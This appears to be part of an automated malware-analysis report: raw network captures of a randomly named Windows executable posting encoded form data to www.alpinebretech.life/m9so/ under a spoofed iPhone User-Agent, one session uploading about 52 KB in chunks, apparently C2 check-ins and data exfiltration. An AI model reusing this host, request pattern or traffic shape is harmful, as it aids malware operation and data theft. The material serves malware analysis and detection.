                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.11.2049835198.177.123.106807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:09.672399998 CET811OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4a 49 46 31 56 2b 66 73 58 70 51 76 39 6a 4d 78 59 36 63 56 50 45 6f 68 43 71 33 6c 59 70 4c 49 63 64 30 4e 41 4c 45 41 64 68 7a 44 33 70 6f 66 45 54 58 71 54 45 2f 66 61 78 46 62 5a 47 57 63 64 41 73 4a 46 79 77 70 33 78 58 74 7a 61 77 31 4b 54 6d 46 4a 50 75 47 64 64 64 2f 44 57 57 39 6f 58 70 69 74 52 69 64 30 57 71 6e 37 61 57 4a 50 33 6e 36 31 2f 46 49 78 45 76 36 52 4d 30 4b 43 73 4d 6a 73 39 4e 4c 4b 63 38 35 43 34 42 56 76 78 30 44 68 34 54 6f 76 6a 41 73 4d 59 61 66 54 68 31 65 75 77 33 48 67 74 5a 45 43 6f 35 50 67 6a 63 52 77 77 3d 3d
                                                                                    Data Ascii: LFPxWlV=ghHQ3Gr/MCFEJIF1V+fsXpQv9jMxY6cVPEohCq3lYpLIcd0NALEAdhzD3pofETXqTE/faxFbZGWcdAsJFywp3xXtzaw1KTmFJPuGddd/DWW9oXpitRid0Wqn7aWJP3n61/FIxEv6RM0KCsMjs9NLKc85C4BVvx0Dh4TovjAsMYafTh1euw3HgtZECo5PgjcRww==
                                                                                    Mar 18, 2024 14:55:09.977924109 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:09 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.11.2049836198.177.123.106807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:12.378052950 CET1151OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4c 74 4e 31 58 5a 44 73 52 4a 51 6f 33 44 4d 78 50 71 63 52 50 45 6b 68 43 72 44 31 5a 66 62 49 63 2f 73 4e 42 4b 45 41 65 68 7a 44 38 4a 6f 65 62 44 58 78 54 45 7a 39 61 78 4a 62 5a 47 79 63 50 6c 77 4a 53 79 77 75 76 68 58 75 6c 71 77 30 4f 54 6d 4c 4a 50 6a 6e 64 63 4a 2f 43 6d 79 39 36 45 42 69 71 45 65 65 6a 6d 71 74 7a 36 57 4b 41 58 6d 37 31 2f 35 75 78 46 57 46 51 36 45 4b 46 50 55 6a 74 39 4e 4b 41 73 38 2b 4e 59 41 66 6b 69 52 49 70 36 33 44 2b 42 41 4a 55 4b 69 47 51 69 6c 75 68 57 44 68 2f 64 68 6d 4b 59 41 35 6b 42 41 66 72 52 5a 42 34 43 6f 59 6c 45 59 45 66 5a 31 5a 5a 46 39 43 61 51 45 42 39 4a 44 71 6a 47 4f 31 7a 79 63 59 69 5a 55 45 2f 38 44 6e 62 69 5a 64 65 66 52 32 73 32 44 54 48 62 62 65 42 44 72 50 4b 68 44 4e 50 68 55 71 68 4d 37 35 30 4f 43 39 38 49 6f 32 58 48 64 45 4f 68 6e 38 73 4a 73 2f 54 34 79 34 35 4e 76 45 2b 6d 4e 6d 72 47 36 31 71 45 52 42 35 52 37 4b 30 30 57 54 30 75 67 76 61 35 6b 74 31 65 68 61 7a 73 53 78 33 38 50 72 62 57 36 65 6d 48 54 62 35 52 42 42 73 77 4b 38 5a 67 4d 45 74 59 6d 6e 76 7a 79 53 2f 36 67 64 62 55 47 57 53 2b 35 50 42 63 73 55 42 6f 79 5a 6d 43 56 34 51 2f 52 68 74 73 49 57 54 48 62 6a 42 5a 6c 5a 45 43 6a 32 38 2b 4e 59 75 4e 59 46 38 61 37 4e 66 56 50 2f 71 6c 6d 76 6a 72 72 65 31 78 75 6d 75 6d 4d 48 64 70 32 65 67 4d 31 4b 6c 4b 53 59 55 33 70 38 36 65 59 43 44 72 4e 75 4f 79 4a 68 74 6a 32 52 47 37 2f 78 73 79 53 41 58 64 2b 54 72 48 4c 45 4d 79 66 5a 72 4d 76 69 54 42 78 47 58 30 6a 6e 54 74 54 4e 62 32 47 57 46 79 68 58 53 64 68 2b 59 6d 54 37 74 44 47 55 71 56 4e 4e 59 49 38 3d
                                                                                    Data Ascii: LFPxWlV=ghHQ3Gr/MCFELtN1XZDsRJQo3DMxPqcRPEkhCrD1ZfbIc/sNBKEAehzD8JoebDXxTEz9axJbZGycPlwJSywuvhXulqw0OTmLJPjndcJ/Cmy96EBiqEeejmqtz6WKAXm71/5uxFWFQ6EKFPUjt9NKAs8+NYAfkiRIp63D+BAJUKiGQiluhWDh/dhmKYA5kBAfrRZB4CoYlEYEfZ1ZZF9CaQEB9JDqjGO1zycYiZUE/8DnbiZdefR2s2DTHbbeBDrPKhDNPhUqhM750OC98Io2XHdEOhn8sJs/T4y45NvE+mNmrG61qERB5R7K00WT0ugva5kt1ehazsSx38PrbW6emHTb5RBBswK8ZgMEtYmnvzyS/6gdbUGWS+5PBcsUBoyZmCV4Q/RhtsIWTHbjBZlZECj28+NYuNYF8a7NfVP/qlmvjrre1xumumMHdp2egM1KlKSYU3p86eYCDrNuOyJhtj2RG7/xsySAXd+TrHLEMyfZrMviTBxGX0jnTtTNb2GWFyhXSdh+YmT7tDGUqVNNYI8=
                                                                                    Mar 18, 2024 14:55:12.675719976 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:12 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    40192.168.11.2049837198.177.123.106807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:15.083128929 CET3858OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.alpinebretech.life
                                                                                    Origin: http://www.alpinebretech.life
                                                                                    Referer: http://www.alpinebretech.life/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 67 68 48 51 33 47 72 2f 4d 43 46 45 4c 74 4e 31 58 5a 44 73 52 4a 51 6f 33 44 4d 78 50 71 63 52 50 45 6b 68 43 72 44 31 5a 66 54 49 63 73 6b 4e 41 70 73 41 51 42 7a 44 78 70 6f 6c 62 44 57 70 54 45 37 35 61 78 55 35 5a 45 36 63 50 79 30 4a 53 68 59 75 71 68 58 76 71 4b 77 79 4b 54 6d 58 4a 50 76 7a 64 63 64 46 44 57 75 39 6f 58 5a 69 74 7a 4b 64 38 47 71 6e 7a 36 57 57 4c 33 6e 47 31 2f 4e 2b 78 46 61 46 51 2f 45 4b 45 39 63 6a 76 71 52 4b 4e 63 38 39 45 34 41 63 2b 53 52 74 70 36 6a 35 2b 42 42 72 55 4c 57 47 51 68 74 75 6d 52 2f 6d 2f 39 68 6d 44 34 41 6d 31 52 4e 57 72 52 56 5a 34 47 6f 59 6c 48 59 45 65 35 31 5a 53 42 52 46 53 51 45 44 32 70 43 71 75 6d 4b 48 7a 79 34 4d 69 5a 41 45 2b 49 6a 6e 61 56 4e 64 4e 4b 6c 32 79 47 44 52 4b 37 62 33 50 54 72 6c 4b 68 7a 5a 50 68 31 66 68 4b 58 35 6d 66 69 39 73 35 6f 33 42 33 64 43 43 42 6e 74 6f 4a 77 7a 54 34 69 30 35 4e 75 42 2b 6a 70 6d 6f 33 4b 31 72 42 6c 43 30 68 37 4e 38 55 58 48 37 4f 73 62 61 39 4e 75 31 65 4a 4b 7a 76 65 78 6c 73 50 72 65 32 47 64 39 6e 53 64 78 78 42 70 78 41 4b 6e 5a 67 41 75 74 63 33 61 76 48 36 53 2b 4c 51 64 4b 30 47 56 43 4f 34 47 58 73 73 53 46 6f 79 5a 6d 43 52 47 51 2f 64 68 74 39 77 57 56 6e 72 6a 48 4b 64 5a 47 43 69 7a 38 2b 4d 65 75 4d 6b 6d 38 61 44 7a 66 56 54 5a 71 6e 71 76 6a 36 37 65 37 56 79 35 71 57 4d 43 4c 5a 32 4a 6b 4a 74 5a 6c 4c 36 41 55 33 35 43 35 73 63 43 52 37 64 75 59 43 4a 69 6e 6a 32 57 4f 62 2f 6e 37 69 65 45 58 64 69 74 72 48 57 66 4d 77 50 5a 6e 6f 71 30 4a 6a 74 67 42 33 6a 70 53 59 37 55 64 33 72 43 50 46 6b 74 43 66 68 6b 62 69 54 35 69 67 53 37 2b 33 68 54 44 39 4f 2b 6a 73 77 2f 4e 58 67 55 4c 62 6e 36 68 37 62 2b 58 50 45 70 31 68 73 4f 57 5a 53 4c 5a 4c 4e 6b 74 35 72 49 2b 52 7a 38 6a 6a 61 49 47 34 77 2b 67 37 46 6d 30 50 76 74 4d 76 52 55 2b 54 69 45 33 67 6c 67 35 43 74 76 47 44 35 68 4d 2f 32 65 6c 78 49 61 2f 59 61 67 4d 67 35 65 6b 52 58 7a 4e 2b 52 58 36 51 33 35 56 59 66 4f 59 6d 55 55 39 47 62 46 58 31 6c 4c 58 50 79 66 67 75 38 77 2f 4e 6d 6b 77 79 72 78 2b 6e 74 77 4c 4b 70 2f 6a 6c 71 65 57 44 66 4a 4d 55 38 74 6b 57 49 46 45 51 7a 55 6c 34 72 62 44 68 5a 64 55 57 49 52 6f 49 66 46 41 77 4b 70 39 33 35 77 79 61 7a 7a 50 7a 52 48 76 39 76 61 4b 35 30 39 6b 38 64 30 42 6e 5a 45 6d 4b 68 7a 72 51 4e 6b 33 30 4e 54 4a 32 43 6e 43 6e 50 73 36 74 4a 61 54 4a 45 33 6b 53 56 72 50 45 79 38 7a 4a 56 77 58 6f 48 34 4a 76 47 78 4e 2b 71 6d 62 43 4e 49 49 63 57 44 54 4f 63 73 52 51 52 52 70 50 52 79 4b 65 38 66 32 34 46 4f 47 66 52 6c 41 6a 4e 57 47 75 36 36 39 2f 39 38 43 6e 52 32 2b 78 31 4d 41 6a 74 50 6c 6d 4a 37 30 71 58 49 38 61 30 59 61 4e 6d 41 43 37 43 31 52 69 39 58 4d 77 47 4a 71 73 61 72 76 36 55 32 42 75 63 58 37 38 57 4a 62 58 48 7a 37 67 58 62 70 59 41 45 6d 7a 43 53 58 6c 31 2f 51 73 55 57 4e 55 4b 69 56 6d 67 54 49 66 69 73 47 33 32 4b 55 67 78 36 4d 76 63 47 53 70 38 63 43 47 56 4c 71 47 41 4f 6c 44 48 30 37 57 43 6e 61 6c 55 7a 6f 49 4b 64 73 54 67 49 72 65 67 2f 6e 6e 2f 75 71 4f 6a 6a 6f 56 70 30 72 41 6f 44 2f 61 48 30 56 6b 2b 51 68 74 6f 45 4c 39 77 55 61 32 72 4c 74 2f 4a 45 35 70 65 5a 4e 65 52 6c 70 49 65 53 49 77 45 55 65 70 53 55 2f 52 36 76 31 56 2b 46 38 36 57 50 45 4e 2b 6e 6b 37 79 70 48 4d 77 58 76 61 33 50 63 49 63 58 43 51 4f 41 31 6e 2f 6c 68 6f 47 77 74 4f 2b 52 68 35 4a 74 37 38 67 35 2b 4b 2f 77 59 5a 32 44 55 71 31 59 52 61 6e 49 4c 66 43 58 54 4e 47 2f 59 57 6a 33 44 71 44 75 79 41 68 4a 70 46 54 4d 54 68 77 7a 43 35 4d 42 56 32 68 4b 6c 5a 4b 63 52 30 42 4a 7a 4d 57 68 65 72 38 69 55 77 34 47 77 57 33 58 75 34 50 6b 46 72 73 6e 6c 50 69 74 61 37 30 68 73 55 63 38 43 45 6e 67 62 62 6c 62 36 2f 4a 31 4f 7a 2b 66 63 35 4e 30 74 6d 63 47 75 64 53 30 56 51 65 6d 77 4c 6c 62 33 6a 6f 50 67 45 64 46 73 36 63 48 49 79 73 73 32 6d 64 76 73 59 65 6f 41 31 47 2f 48 69 4f 4c 5a 46 6b 69 54 50 43 4d 77 6f 2b 51 2f 69 65 2f 2b 7a 56 73 71 76 76 72 49 35 2b 71 45 6b 50 57 49 45 4d 64 59 56 75 4b 37 6d 53 6e 4f 51 56 36 77 41 63 48 32 35 51 4d 52 6b 31 38 58 4b 55 6b 70 36 54 46 34 5a 69 37 64 6d 48 73 55 76 2f 64 30 6b 52 66 56 53 70 62 7a 7a 63
                                                                                    Data Ascii: LFPxWlV=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
                                                                                    Mar 18, 2024 14:55:15.083197117 CET9002OUTData Raw: 58 70 4b 49 6f 73 39 59 75 65 46 48 69 4a 30 66 6a 35 67 44 43 33 6e 4f 4a 77 34 6a 2f 36 49 59 31 75 38 49 74 30 71 52 66 6e 44 44 65 76 4c 31 44 30 55 6b 6d 79 4f 49 2f 51 6a 4d 76 44 62 4c 76 67 59 38 4a 52 41 62 63 70 55 31 42 4e 6c 55 72 35
                                                                                    Data Ascii: XpKIos9YueFHiJ0fj5gDC3nOJw4j/6IY1u8It0qRfnDDevL1D0UkmyOI/QjMvDbLvgY8JRAbcpU1BNlUr5PfIsT2ZaQ6rGVvRO7fXRaVyc1wnch6xkUxezX1TXrbQOiABpxXr+IFfQyBinyjpa+rTtc96H1YHI1SCc98OOu3PI/3Fdi3/7dKxh2MJfvmTUNgHATAFHEYBlUT6PDMoQhgxXqN1C6sNn2yq60hoffjXxyeFSCqQ8j
                                                                                    Mar 18, 2024 14:55:15.266860962 CET2572OUTData Raw: 37 32 52 48 35 44 34 59 4e 32 69 49 38 74 65 33 73 37 6f 71 4e 52 6a 6f 4c 74 43 46 4f 4f 77 6d 47 72 69 7a 45 2f 65 54 2f 76 4f 67 79 4d 49 65 5a 6d 34 47 45 31 35 71 75 6a 79 53 36 53 6d 6f 7a 75 62 52 56 52 43 58 54 63 62 71 6a 4c 79 7a 37 65
                                                                                    Data Ascii: 72RH5D4YN2iI8te3s7oqNRjoLtCFOOwmGrizE/eT/vOgyMIeZm4GE15qujyS6SmozubRVRCXTcbqjLyz7eHhe44eYsHg9kcicJ4Sy+TrNoIvGUW5kqjEnEmIqagu/7EkX8M68oCG2AooziLoYwlH6tGpeqc2bxFd7sFq9RZIDcYZpLstDnlMDnSD9PFHLML2XX+YCItWx/rl02wbB3k15mW7lD9FvBi81Y39mBGSCbl4Yar4pge
                                                                                    Mar 18, 2024 14:55:15.266951084 CET9002OUTData Raw: 51 78 76 67 31 36 37 68 4b 71 67 38 68 38 73 57 57 43 7a 77 42 6d 39 73 6e 65 58 52 59 34 72 59 42 2f 57 39 6d 42 54 6c 34 74 77 4c 57 39 79 31 6b 6e 64 66 50 71 47 43 4e 79 36 48 57 4d 52 75 54 64 45 4d 4d 34 6a 74 6b 38 55 66 4b 54 6d 2f 75 71
                                                                                    Data Ascii: Qxvg167hKqg8h8sWWCzwBm9sneXRY4rYB/W9mBTl4twLW9y1kndfPqGCNy6HWMRuTdEMM4jtk8UfKTm/uqELP+073C+e6f2G1cRbSfa/2Z4/EPFhU0mAY/2BWAiiu9kxOZZNonKE0X7Oc7P5NdGt0yBzFg2tpvHhax4aMgPdD+zS2aam51mTMkWDYs86E9ZB51QFk69mKwEor2OYigHGN6aItYEgRBpMi16buXgyKXiVqwgwPOr
                                                                                    Mar 18, 2024 14:55:15.267000914 CET1286OUTData Raw: 53 45 2b 6a 52 58 57 67 6e 4d 35 55 46 4f 76 32 39 30 31 79 2f 34 65 67 34 6b 42 33 38 66 35 7a 4a 56 39 56 53 39 4e 46 41 4b 79 33 70 4c 4d 2f 5a 78 39 2b 59 67 51 6a 31 63 38 4a 4b 4c 6d 69 6d 37 6b 4a 77 2f 67 78 5a 4d 76 67 32 4d 79 6e 4b 30
                                                                                    Data Ascii: SE+jRXWgnM5UFOv2901y/4eg4kB38f5zJV9VS9NFAKy3pLM/Zx9+YgQj1c8JKLmim7kJw/gxZMvg2MynK0ot8THkHgzoq1QENKuDkrfuu5e5m8zhQDWJYNz+qHwdIBMyXj9hQg9gAjJwymPPa8uuON5uczrWy020s1Id3t4zk8aax0vzWM9/avf9IMUkAHugnMl2PX4W2TJD9zih8elpJb7WQqrhc9i9E7tx3rQ7Ac4Bzuejac4
                                                                                    Mar 18, 2024 14:55:15.267211914 CET2572OUTData Raw: 39 34 39 7a 66 56 6f 4b 49 54 54 36 70 33 30 64 67 67 36 69 34 46 42 31 35 5a 37 6a 72 30 41 4f 59 6e 6e 50 56 56 6e 67 49 73 34 46 5a 65 76 33 53 76 45 67 42 67 71 73 76 6f 74 59 4d 62 38 69 6e 2b 65 6c 56 7a 50 4c 71 6d 31 6a 39 41 4f 6c 41 44
                                                                                    Data Ascii: 949zfVoKITT6p30dgg6i4FB15Z7jr0AOYnnPVVngIs4FZev3SvEgBgqsvotYMb8in+elVzPLqm1j9AOlADGAF863Z+6npV1bfoI3iSdhNC+55yWf/JHCN74ev3RrE3IXip8pPKhZxxmdBXGDL3Wh/h8mO6Cr98OQKTVBB4tka7czU8AKjaGH4HekAjKGtT+1SOh5xKqZeiBjFBcN1rrzmJzvkMtRH41TpMkcwIiOapO0lH7zH3F
                                                                                    Mar 18, 2024 14:55:15.267658949 CET2572OUTData Raw: 74 31 56 33 49 67 59 4a 67 30 74 32 70 53 55 30 61 41 6b 44 70 4b 7a 41 36 51 78 2f 6b 76 61 4b 59 32 34 57 67 4c 69 49 53 6c 6b 35 2b 43 69 74 49 36 45 33 77 32 73 43 62 50 76 4c 5a 57 7a 4d 52 43 34 38 48 64 48 49 77 32 41 4f 6c 75 31 43 65 58
                                                                                    Data Ascii: t1V3IgYJg0t2pSU0aAkDpKzA6Qx/kvaKY24WgLiISlk5+CitI6E3w2sCbPvLZWzMRC48HdHIw2AOlu1CeXkg6ywdQOPpaYSvDNmk1K1mvr/ZAVJMAOLauzZKmLV0saoVptEudKgmRyXLReihnbPxOk33jOMRDgOABWRfulK5+xU7SR82FSvlL/jgXUyFsmLWgcuBDqUuFW1OwHfCxafXbt9SqWhH5oBe//Q/re76SZitwzn0J8R
                                                                                    Mar 18, 2024 14:55:15.268174887 CET2572OUTData Raw: 34 58 47 37 59 75 6d 63 4c 41 72 35 58 51 36 66 30 63 4e 4a 34 59 68 61 66 75 61 6f 52 59 6d 66 6d 64 6a 71 70 42 57 37 38 4d 73 57 7a 46 46 77 52 33 4c 77 52 4e 51 52 65 44 38 37 6f 35 36 32 54 61 53 52 47 63 6f 63 35 61 4c 72 4e 4e 42 6b 65 48
                                                                                    Data Ascii: 4XG7YumcLAr5XQ6f0cNJ4YhafuaoRYmfmdjqpBW78MsWzFFwR3LwRNQReD87o562TaSRGcoc5aLrNNBkeHYt6ANS7sy0/4/vEwQjPcAt7oYF4mtG1S14+XVPyQO5IY8dtX7lD3aMrXFl3cvCB/N2wXyv48U8lAvQLQOVv2A4NkeOHHOpVuQd8pTEvEWrIIoAGvQDIEfn6dWl1Dhwhr5slK/Z8FXb2DgGzv6aj0MX4ezN+mPQ7ej
                                                                                    Mar 18, 2024 14:55:15.268754959 CET2572OUTData Raw: 55 51 73 43 54 75 41 64 4a 38 30 4d 32 42 4a 4d 48 45 67 4c 7a 66 67 71 66 78 6e 31 6f 54 2b 2b 2b 7a 35 55 46 50 5a 66 39 6c 7a 74 35 73 61 77 4e 47 70 73 77 4a 75 61 43 71 33 43 55 39 58 7a 4d 68 44 47 33 56 37 64 57 34 48 6d 45 70 34 61 44 6b
                                                                                    Data Ascii: UQsCTuAdJ80M2BJMHEgLzfgqfxn1oT+++z5UFPZf9lzt5sawNGpswJuaCq3CU9XzMhDG3V7dW4HmEp4aDkS3dRCnE3HbXx2nxOZH7Fytqz/sLp7iL69V5yvvVkVt8yL7hJZASMiC8pqx4HUPvPRqt+oAmeaGa1GGOdklRPAoLcFT9ffqZg3cV+iG8zIE9sHiqhELa0zBxCRNnqA9t4zgvdR1z8ZIAU22UJF5BfvEmbksBO+LNx0
                                                                                    Mar 18, 2024 14:55:15.269390106 CET2572OUTData Raw: 46 42 4c 56 65 6e 76 74 66 69 34 69 38 39 37 72 65 72 2b 6b 72 6e 6a 4d 5a 67 64 51 4a 49 59 4c 33 32 55 66 2b 6a 78 68 36 33 65 66 34 7a 35 31 6c 51 2b 6e 75 52 7a 70 65 35 6a 37 70 51 68 64 32 69 53 31 45 2f 59 47 64 67 51 38 4a 66 4d 75 4d 5a
                                                                                    Data Ascii: FBLVenvtfi4i897rer+krnjMZgdQJIYL32Uf+jxh63ef4z51lQ+nuRzpe5j7pQhd2iS1E/YGdgQ8JfMuMZS7KDdxiopqKUCdkfBQDZ/UZnRhz0EFT1Ks6eE8fweuMh+dlsF+oV5nmKg2DR+y3G9ER8oqHgxUcpSwtcLnkjmmJo69nS95BIo8stb56pDAHAnxsFT/Cp1rhCG5dCuu54JPza109wx813REt78cZU3iNbxX8aH+aYl
